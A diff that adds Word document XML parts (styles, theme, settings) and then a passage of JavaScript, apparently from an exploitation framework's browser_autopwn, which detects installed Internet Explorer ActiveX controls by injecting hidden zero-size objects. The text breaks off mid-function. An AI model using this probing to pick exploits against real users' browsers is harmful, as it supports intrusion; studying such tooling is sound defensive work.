+<m:mathPr>
+<m:mathFont m:val="Cambria Math"/>
+<m:brkBin m:val="before"/>
+<m:brkBinSub m:val="--"/>
+<m:smallFrac m:val="off"/>
+<m:dispDef/>
+<m:lMargin m:val="0"/>
+<m:rMargin m:val="0"/>
+<m:defJc m:val="centerGroup"/>
+<m:wrapIndent m:val="1440"/>
+<m:intLim m:val="subSup"/>
+<m:naryLim m:val="undOvr"/>
+</m:mathPr>
+<w:themeFontLang w:val="en-US"/>
+<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
+<w:shapeDefaults>
+<o:shapedefaults v:ext="edit" spidmax="1026"/>
+<o:shapelayout v:ext="edit">
+<o:idmap v:ext="edit" data="1"/>
+</o:shapelayout>
+</w:shapeDefaults>
+<w:decimalSymbol w:val=","/>
+<w:listSeparator w:val=";"/>
+</w:settings>
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:docDefaults>
+<w:rPrDefault>
+<w:rPr>
+<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+<w:sz w:val="22"/>
+<w:szCs w:val="22"/>
+<w:lang w:val="en-US" w:bidi="ar-SA"/>
+</w:rPr>
+</w:rPrDefault>
+<w:pPrDefault>
+<w:pPr>
+<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+</w:pPr>
+</w:pPrDefault>
+</w:docDefaults>
+<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="toc 1" w:uiPriority="39"/>
+<w:lsdException w:name="toc 2" w:uiPriority="39"/>
+<w:lsdException w:name="toc 3" w:uiPriority="39"/>
+<w:lsdException w:name="toc 4" w:uiPriority="39"/>
+<w:lsdException w:name="toc 5" w:uiPriority="39"/>
+<w:lsdException w:name="toc 6" w:uiPriority="39"/>
+<w:lsdException w:name="toc 7" w:uiPriority="39"/>
+<w:lsdException w:name="toc 8" w:uiPriority="39"/>
+<w:lsdException w:name="toc 9" w:uiPriority="39"/>
+<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+</w:latentStyles>
+<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+<w:name w:val="Normal"/>
+<w:qFormat/>
+<w:rsid w:val="00063BF6"/>
+</w:style>
+<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+<w:name w:val="Default Paragraph Font"/>
+<w:uiPriority w:val="1"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="table" w:default="1" w:styleId="TableNormal">
+<w:name w:val="Normal Table"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:qFormat/>
+<w:tblPr>
+<w:tblInd w:w="0" w:type="dxa"/>
+<w:tblCellMar>
+<w:top w:w="0" w:type="dxa"/>
+<w:left w:w="108" w:type="dxa"/>
+<w:bottom w:w="0" w:type="dxa"/>
+<w:right w:w="108" w:type="dxa"/>
+</w:tblCellMar>
+</w:tblPr>
+</w:style>
+<w:style w:type="numbering" w:default="1" w:styleId="NoList">
+<w:name w:val="No List"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="paragraph" w:styleId="BalloonText">
+<w:name w:val="Balloon Text"/>
+<w:basedOn w:val="Normal"/>
+<w:link w:val="BalloonTextChar"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:rsid w:val="00CD271A"/>
+<w:pPr>
+<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+</w:pPr>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
+<w:name w:val="Balloon Text Char"/>
+<w:basedOn w:val="DefaultParagraphFont"/>
+<w:link w:val="BalloonText"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:rsid w:val="00CD271A"/>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+</w:styles>
@@ -0,0 +1,283 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+<a:themeElements>
+<a:clrScheme name="Office">
+<a:dk1>
+<a:sysClr val="windowText" lastClr="000000"/>
+</a:dk1>
+<a:lt1>
+<a:sysClr val="window" lastClr="FFFFFF"/>
+</a:lt1>
+<a:dk2>
+<a:srgbClr val="1F497D"/>
+</a:dk2>
+<a:lt2>
+<a:srgbClr val="EEECE1"/>
+</a:lt2>
+<a:accent1>
+<a:srgbClr val="4F81BD"/>
+</a:accent1>
+<a:accent2>
+<a:srgbClr val="C0504D"/>
+</a:accent2>
+<a:accent3>
+<a:srgbClr val="9BBB59"/>
+</a:accent3>
+<a:accent4>
+<a:srgbClr val="8064A2"/>
+</a:accent4>
+<a:accent5>
+<a:srgbClr val="4BACC6"/>
+</a:accent5>
+<a:accent6>
+<a:srgbClr val="F79646"/>
+</a:accent6>
+<a:hlink>
+<a:srgbClr val="0000FF"/>
+</a:hlink>
+<a:folHlink>
+<a:srgbClr val="800080"/>
+</a:folHlink>
+</a:clrScheme>
+<a:fontScheme name="Office">
+<a:majorFont>
+<a:latin typeface="Cambria"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ ゴシック"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Times New Roman"/>
+<a:font script="Hebr" typeface="Times New Roman"/>
+<a:font script="Thai" typeface="Angsana New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="MoolBoran"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Times New Roman"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:majorFont>
+<a:minorFont>
+<a:latin typeface="Calibri"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ 明朝"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Arial"/>
+<a:font script="Hebr" typeface="Arial"/>
+<a:font script="Thai" typeface="Cordia New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="DaunPenh"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Arial"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:minorFont>
+</a:fontScheme>
+<a:fmtScheme name="Office">
+<a:fillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="50000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="35000">
+<a:schemeClr val="phClr">
+<a:tint val="37000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:tint val="15000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="1"/>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:shade val="51000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="80000">
+<a:schemeClr val="phClr">
+<a:shade val="93000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="94000"/>
+<a:satMod val="135000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="0"/>
+</a:gradFill>
+</a:fillStyleLst>
+<a:lnStyleLst>
+<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr">
+<a:shade val="95000"/>
+<a:satMod val="105000"/>
+</a:schemeClr>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+</a:lnStyleLst>
+<a:effectStyleLst>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="38000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+<a:scene3d>
+<a:camera prst="orthographicFront">
+<a:rot lat="0" lon="0" rev="0"/>
+</a:camera>
+<a:lightRig rig="threePt" dir="t">
+<a:rot lat="0" lon="0" rev="1200000"/>
+</a:lightRig>
+</a:scene3d>
+<a:sp3d>
+<a:bevelT w="63500" h="25400"/>
+</a:sp3d>
+</a:effectStyle>
+</a:effectStyleLst>
+<a:bgFillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="40000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="40000">
+<a:schemeClr val="phClr">
+<a:tint val="45000"/>
+<a:shade val="99000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="20000"/>
+<a:satMod val="255000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
+</a:path>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="80000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="30000"/>
+<a:satMod val="200000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
+</a:path>
+</a:gradFill>
+</a:bgFillStyleLst>
+</a:fmtScheme>
+</a:themeElements>
+<a:objectDefaults/>
+<a:extraClrSchemeLst/>
+</a:theme>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:optimizeForBrowser/>
+</w:webSettings>
@@ -0,0 +1,89 @@
+window.ie_addons_detect = { };
+
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+window.ie_addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
